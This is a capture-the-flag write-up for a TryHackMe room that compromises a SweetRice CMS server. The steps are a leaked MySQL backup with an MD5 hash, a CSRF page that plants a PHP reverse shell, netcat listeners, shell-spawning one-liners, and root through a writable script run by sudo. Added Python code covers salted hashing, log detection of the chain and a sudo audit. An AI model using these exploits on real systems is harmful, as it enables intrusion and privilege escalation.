# Lazy Admin

{% embed url="https://tryhackme.com/room/lazyadmin" %}

## Enumeration

### nmap

```bash
nmap [ip] -vv -T4 -sV -A -p-
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCo0a0DBybd2oCUPGjhXN1BQrAhbKKJhN/PW2OCccDm6KB/+sH/2UWHy3kE1XDgWO2W3EEHVd6vf7SdrCt7sWhJSno/q1ICO6ZnHBCjyWcRMxojBvVtS4kOlzungcirIpPDxiDChZoy+ZdlC3hgnzS5ih/RstPbIy0uG7QI/K7wFzW7dqMlYw62CupjNHt/O16DlokjkzSdq9eyYwzef/CDRb5QnpkTX5iQcxyKiPzZVdX/W8pfP3VfLyd/cxBqvbtQcl3iT1n+QwL8+QArh01boMgWs6oIDxvPxvXoJ0Ts0pEQ2BFC9u7CgdvQz1p+VtuxdH6mu9YztRymXmXPKJfB
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBC8TzxsGQ1Xtyg+XwisNmDmdsHKumQYqiUbxqVd+E0E0TdRaeIkSGov/GKoXY00EX2izJSImiJtn0j988XBOTFE=
|   256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAILe/TbqqjC/bQMfBM29kV2xApQbhUXLFwFJPU14Y9/Nm
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-server-header: Apache/2.4.18 (Ubuntu)
Device type: general purpose
Running: Linux 4.X
OS CPE: cpe:/o:linux:linux_kernel:4.15
OS details: Linux 4.15
TCP/IP fingerprint:
OS:SCAN(V=7.95%E=4%D=5/13%OT=22%CT=1%CU=43043%PV=Y%DS=4%DC=T%G=Y%TM=68234EC
OS:2%P=x86_64-pc-linux-gnu)SEQ(SP=103%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7%O5=M508ST1
OS:1NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN
OS:(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
```

### Web page (port 80)

<figure><img src="/files/Dmg3XSF9gwfXDl8TAuRn" alt=""><figcaption><p>Default web page</p></figcaption></figure>

### Directory search (gobuster)

Gobuster finds one directory, `/content`.

<figure><img src="/files/BS5VQKlmErhzGp17Aj0h" alt=""><figcaption></figcaption></figure>

## Exploitation

### Going deeper

{% embed url="https://www.exploit-db.com/exploits/10246" %}

<figure><img src="/files/AVBnypsvTc5q0XAH5RZM" alt=""><figcaption><p>content page</p></figcaption></figure>

We can see some useful info on the page: it is powered by **SweetRice**.

On Exploit-DB I found one entry for it, labelled as an RFI. It does not work as an RFI here, but the paths it references are still useful: we can try them against the target and see whether anything exists.

Since there is no **sweetrice** directory, we assume that **content** is the application root in this case; appending `_plugin` gives us a full directory index.

Other than that, there are no directories we can exploit.

<figure><img src="/files/bkjSA695qMXsRXfuUxAU" alt=""><figcaption><p>index of /content/_plugin</p></figcaption></figure>

### Accessing backup file

{% embed url="https://www.exploit-db.com/exploits/40718" %}

<figure><img src="/files/aZqJOKxsjaE7aeWbnuev" alt=""><figcaption><p>Mysql backup file</p></figcaption></figure>

I checked several of the exploits, since we do not know the version, and found the **backup disclosure** one.

Now we append `/inc/mysql_backup` to the URL and reach the SQL backup file.

Opening the file, we look for stored credentials; any user will do here.

### Getting creds

<figure><img src="/files/AYzriMZ8pb9gMYuatPRt" alt=""><figcaption></figcaption></figure>

And we got it, admin: manager | passwd: `<hash>`

We can paste the hash into CyberChef and analyse it; it appears to be an MD5 hash.

<figure><img src="/files/abpk5U47CwuB0ImozKe3" alt=""><figcaption><p>Password</p></figcaption></figure>

After cracking it we can see it is a weak password.

Since we have no idea where the login page is, we can use another exploit, which only requires editing an HTML file and opening it.
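The reason the backup is enough to log in is that the CMS stores a bare, unsalted MD5. The following is an added example, not code from the write-up or from SweetRice: it guesses the digest type by shape (the same check CyberChef's hash analyser makes), shows that unsalted MD5 gives every user with the same password the same stored value, and contrasts that with salted PBKDF2. The password and all digests in it are constructed.

```python
"""Why an unsalted MD5 in a leaked backup is as good as the password itself.

Added example, not from the write-up. The password and digests are constructed.
"""
import hashlib
import hmac
import os
import re

HEX = re.compile(r"^[0-9a-f]+$")
BY_LENGTH = {32: "MD5 (or MD4/NTLM)", 40: "SHA-1", 64: "SHA-256", 128: "SHA-512"}


def classify_digest(digest):
    """Name the likely algorithm from hex length; None if not a bare hex digest."""
    d = digest.strip().lower()
    if not HEX.match(d):
        return None
    return BY_LENGTH.get(len(d), f"unknown ({len(d)} hex chars)")


def unsalted_md5(password):
    """What older CMSs stored: a bare MD5, identical for identical passwords."""
    return hashlib.md5(password.encode()).hexdigest()


def store_password(password, iterations=200_000):
    """Salted PBKDF2-HMAC-SHA256, encoded as algo$iterations$salt$hash."""
    salt = os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(stored, candidate):
    """Recompute with the stored salt and compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac(
        "sha256", candidate.encode(), bytes.fromhex(salt_hex), int(iterations)
    )
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    pw = "Password1"  # constructed weak password, not the box's
    print(classify_digest(unsalted_md5(pw)))
    # every account with this password gets the same MD5, so one crack opens all
    print(unsalted_md5(pw) == unsalted_md5(pw))
    a, b = store_password(pw), store_password(pw)
    # salted: two different stored strings, both still verify
    print(a != b, verify_password(a, pw), verify_password(b, "wrong"))
```

The 32-hex-character shape is what makes the CyberChef guess of MD5 reasonable; with the salted form, a dumped table no longer reveals which users share a password and every guess has to be recomputed per user.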

### RCE

{% embed url="https://www.exploit-db.com/exploits/40700" %}

* This is the HTML file you have to edit:

```html
<html>
<body onload="document.exploit.submit();">
<form action="http://localhost/content/as/?type=ad&mode=save" method="POST" name="exploit">
<input type="hidden" name="adk" value="hacked"/>
<textarea type="hidden" name="adv">
<?php
echo '<h1> Hacked </h1>';
phpinfo();?>
</textarea>
</form>
</body>
</html>
<!-- After the HTML file has executed, the page is reachable at
     http://localhost/content/inc/ads/hacked.php -->
```

This file checks whether the vulnerability works by creating a **hacked.php** file (change the path in the form action to the current one, e.g. **sweetrice** → **content**).

But I want to speed up the process, so I just paste the whole PHP reverse shell into the textarea of the HTML file instead: <https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php>

<figure><img src="/files/rTUFY5JEXIGhmIfB9pvI" alt=""><figcaption><p>open html file</p></figcaption></figure>

Open the file in Firefox; it should redirect to a login page. Enter the credentials obtained earlier and we are in.

Start netcat to listen for the incoming connection: `nc -lvnp <port_you_are_listening_to>`

Notice the **hacked** entry above the ads editing section; we trigger the RCE by browsing to `http://RHOST/content/inc/ads/hacked.php`

<figure><img src="/files/Hy0p07uXCpPFR6JL6maY" alt=""><figcaption><p>logged in</p></figcaption></figure>

Back in the terminal, we have a shell.

### Upgrading shell session

We can upgrade our shell, but it is not required.
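From the defender's side, the whole chain above leaves a recognisable trail in the Apache access log: a read of the backup directory, a `POST` to the ad editor, then a `GET` of a freshly created `.php` under `/content/inc/ads/` from the same client. The script below is an added example, not part of the write-up or of SweetRice; the log lines in it are constructed, and only the request paths are taken from this page.

```python
"""Detect the SweetRice attack chain from this write-up in Apache access logs.

Added example, not part of the original write-up. The log lines are constructed;
the request paths are the ones the write-up uses.
"""
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import parse_qs, urlsplit

# Apache common/combined log: client ident user [time] "METHOD path proto" status size
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

BACKUP_PREFIX = "/content/inc/mysql_backup"  # backup disclosure (EDB 40718)
ADS_DIR = "/content/inc/ads/"                # where the ad editor writes .php files


def parse(line):
    """Parse one access-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    rec["status"] = int(rec["status"])
    return rec


def is_ad_save(rec):
    """POST /content/as/?type=ad&mode=save is the request the CSRF page fires."""
    url = urlsplit(rec["path"])
    if rec["method"] != "POST" or url.path != "/content/as/":
        return False
    q = parse_qs(url.query)
    return q.get("type") == ["ad"] and q.get("mode") == ["save"]


def is_ad_php(rec):
    """A .php file fetched from the ads directory."""
    p = rec["path"].split("?", 1)[0]
    return p.startswith(ADS_DIR) and p.endswith(".php")


def detect(lines, window_s=600):
    """Return (client_ip, finding) pairs for the two behaviours worth alerting on."""
    findings = []
    saves = defaultdict(list)  # ip -> timestamps of ad-save POSTs
    for line in lines:
        rec = parse(line)
        if rec is None:
            continue
        ip, ts = rec["ip"], rec["ts"]
        if rec["path"].startswith(BACKUP_PREFIX) and rec["status"] == 200:
            findings.append((ip, f"backup disclosure read: {rec['path']}"))
        if is_ad_save(rec):
            saves[ip].append(ts)
        elif is_ad_php(rec):
            # an ad .php fetched shortly after the same client saved an ad
            if any(0 <= (ts - t).total_seconds() <= window_s for t in saves[ip]):
                findings.append((ip, f"ad save followed by PHP execution: {rec['path']}"))
    return findings


# Constructed sample: one client walks the chain, another only views an existing ad.
SAMPLE_LOG = """\
10.0.0.5 - - [13/May/2025:10:01:02 +0000] "GET /content/ HTTP/1.1" 200 2310
10.0.0.5 - - [13/May/2025:10:02:10 +0000] "GET /content/inc/mysql_backup/ HTTP/1.1" 200 745
10.0.0.5 - - [13/May/2025:10:05:40 +0000] "POST /content/as/?type=ad&mode=save HTTP/1.1" 200 118
10.0.0.5 - - [13/May/2025:10:06:01 +0000] "GET /content/inc/ads/hacked.php HTTP/1.1" 200 36
10.0.0.9 - - [13/May/2025:10:07:00 +0000] "GET /content/inc/ads/banner.php HTTP/1.1" 200 512
""".splitlines()

if __name__ == "__main__":
    for ip, finding in detect(SAMPLE_LOG):
        print(ip, finding)
```

The second rule deliberately pairs the save with the later `GET` from the same address rather than alerting on every ad save, so normal use of the editor stays quiet; a legitimate ad file viewed by an unrelated visitor (the `10.0.0.9` line) is not reported.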

<https://wiki.zacheller.dev/pentest/privilege-escalation/spawning-a-tty-shell>

```bash
# Python
python -c 'import pty; pty.spawn("/bin/sh")'

# From within a Python shell
echo os.system('/bin/bash')

/bin/sh -i

perl -e 'exec "/bin/sh";'

# From within perl
perl: exec "/bin/sh";

# From within ruby
ruby: exec "/bin/sh"

# From within lua
lua: os.execute('/bin/sh')

# From within IRB
exec "/bin/sh"

# From within vi
:!bash

# From within vi
:set shell=/bin/bash:shell

# From within nmap
!sh

/usr/bin/script -qc /bin/bash /dev/null
```

### Privilege escalation

{% embed url="https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" %}

Let’s do a simple `sudo -l`

<figure><img src="/files/mkbZJdEUC3MXrh6uX9qW" alt=""><figcaption><p>sudo -l</p></figcaption></figure>

We can see that `/usr/bin/perl /home/itguy/backup.pl` can be run with sudo.

I tried using only **perl**, but it requires a password, so let's take a look inside **backup.pl**.

<figure><img src="/files/GMGwcZPCgejL8JlaXYgA" alt=""><figcaption></figcaption></figure>

The script executes another file, `/etc/copy.sh`.

Let's see what's inside. It is another reverse shell.

Open another netcat listener (it must be on a different port).

We can just change the IP and port to our machine's, then execute it with `sudo /usr/bin/perl /home/itguy/backup.pl`

<figure><img src="/files/WBLU1ZnqZM9wp6M7hj8G" alt=""><figcaption><p>modifying &#x26; executing copy.sh</p></figcaption></figure>

<figure><img src="/files/Zing2DZiw0oghEflbC6L" alt=""><figcaption><p>Reverse shell</p></figcaption></figure>

And now we are root.

The flags are in the **itguy** and **root** directories.
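The root cause of the escalation is not the sudo rule itself but the fact that the script it runs calls a file any user can edit. The audit below is an added example, not part of the write-up or of the box: it rebuilds the `backup.pl` → `copy.sh` chain in a temporary directory (constructed stand-ins for `/home/itguy/backup.pl` and `/etc/copy.sh`), extracts every path the Perl script executes, and reports any that is writable by someone other than a trusted account.

```python
"""Audit a sudo-allowed script for calls into files that other users can modify.

Added example, not part of the write-up. The files it creates are constructed
stand-ins for the box's /home/itguy/backup.pl and /etc/copy.sh.
"""
import os
import re
import stat
import tempfile

# Absolute paths a Perl script hands to system()/exec()/qx() or to backticks.
CALL_RE = re.compile(
    r'(?:system|exec|qx)\s*\(?\s*["\'`]\s*(/[^\s"\'`;|&]+)'
    r'|`\s*(/[^\s`;|&]+)'
)


def invoked_paths(script_text):
    """Return, in order of appearance, the absolute paths the script executes."""
    found = []
    for m in CALL_RE.finditer(script_text):
        path = m.group(1) or m.group(2)
        if path not in found:
            found.append(path)
    return found


def audit_sudo_script(script_path, trusted_uids=(0,)):
    """Return (path, reason) pairs for the script and each file it runs.

    A sudo rule is only as strong as the least protected file on this list: if
    any of them can be changed by an unprivileged user, that user chooses what
    runs as root.
    """
    findings = []
    with open(script_path) as fh:
        text = fh.read()
    for path in [script_path] + invoked_paths(text):
        if not os.path.exists(path):
            findings.append((path, "missing: an unprivileged user could create it"))
            continue
        st = os.stat(path)
        if st.st_mode & stat.S_IWOTH:
            findings.append((path, "world-writable"))
        elif st.st_mode & stat.S_IWGRP:
            findings.append((path, "group-writable"))
        elif st.st_uid not in trusted_uids:
            findings.append((path, f"owned by uid {st.st_uid}, not a trusted account"))
    return findings


def build_demo(root):
    """Recreate the box's layout under `root` (constructed copies, not the real files)."""
    copy_sh = os.path.join(root, "copy.sh")
    helper_sh = os.path.join(root, "helper.sh")
    backup_pl = os.path.join(root, "backup.pl")
    with open(copy_sh, "w") as fh:
        fh.write("#!/bin/bash\n# stand-in for /etc/copy.sh\n")
    os.chmod(copy_sh, 0o777)      # the misconfiguration found on the box
    with open(helper_sh, "w") as fh:
        fh.write("#!/bin/bash\necho ok\n")
    os.chmod(helper_sh, 0o755)    # a correctly protected script, for contrast
    with open(backup_pl, "w") as fh:
        fh.write(f'system("{copy_sh}");\nmy $out = `{helper_sh} --quiet`;\n')
    os.chmod(backup_pl, 0o755)
    return backup_pl


def demo():
    """Run the audit on the rebuilt layout; only copy.sh should be reported."""
    with tempfile.TemporaryDirectory() as root:
        script = build_demo(root)
        # the current user stands in for root as the trusted owner of these files
        results = audit_sudo_script(script, trusted_uids=(0, os.getuid()))
        return [(os.path.basename(p), reason) for p, reason in results]


if __name__ == "__main__":
    for name, reason in demo():
        print(f"{name}: {reason}")
```

On a real host the fix is `chmod 755 /etc/copy.sh` with root ownership, or better, not letting a NOPASSWD rule reach a script that shells out at all; the audit is meant to be run against the actual sudoers targets with the default `trusted_uids=(0,)`.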
